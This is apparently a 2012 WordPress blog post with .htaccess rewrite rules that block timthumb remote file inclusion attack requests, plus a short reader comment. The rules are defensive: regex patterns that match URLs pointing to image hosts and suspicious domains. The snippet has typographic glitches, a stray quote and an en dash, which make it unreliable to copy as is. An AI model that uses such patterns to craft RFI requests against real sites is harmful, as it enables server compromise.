Stop Timthumb Attacks at Server

Stop Timthumb Attacks Before WordPress

Stop timthumb attacks wordpress iconAll owners of busy, and not so busy, self-hosted WordPress sites and blogs will know all about timthumb scripting attacks on their site. If the site has the latest up to date version of the vulnerable files, that’s as far as the attack will go.

But constant timthumb attacks are still annoying and use up resources with 404 page not found responses.

Stop Timthumb Attacks at Front Door

Here’s a way to stop these annoying attacks at the front door, before they even get to WordPress. The following script shown below added to your website or blog .htaccess file will prevent nearly all timthumb RFI attacks from wasting server resources.

RewriteEngine On

# TimThumb Forbid RFI By Host Name But Allow Internal Requests
RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
RewriteRule .* index.php [F,L]
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule . – [S=1]’

This script must be added AFTER the line RewriteEngine On and BEFORE the WordPress section of the .htaccess file # BEGIN WordPress

Note: The # at the beginning of the script means the line is a comment and does not get executed by the server.  [F,L] F tells the server the request is Forbidden –  L means it is the Last rule to follow if the rule matches the incoming request. L is not always necessary as F is also a Last instruction.

If you watch your server activity logs (assuming you are using Apache hosting with CPanel – other set-ups may work differently) you will see 403 forbidden or server error 500 codes being sent to the hacker or the bot searching for timthumb vulnerability.

Not an Excuse to Ignore other Good Practices

This script should not be used instead of good practice. The vulnerable script files, every instance of timthumb.php phpthumb.php and thumb.php must still be updated to the latest version.

me on google plus+Mike Otgaar

About Mike

Web Developer and Techno-geek Saltwater fishing nut Blogger

Posted on August 22, 2012, in WordPress and tagged , , , , , , . Bookmark the permalink. 2 Comments.

  1. Thanks for this post! It’s a great image manipulator, but it’s getting royally spanked by malware infectors!

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: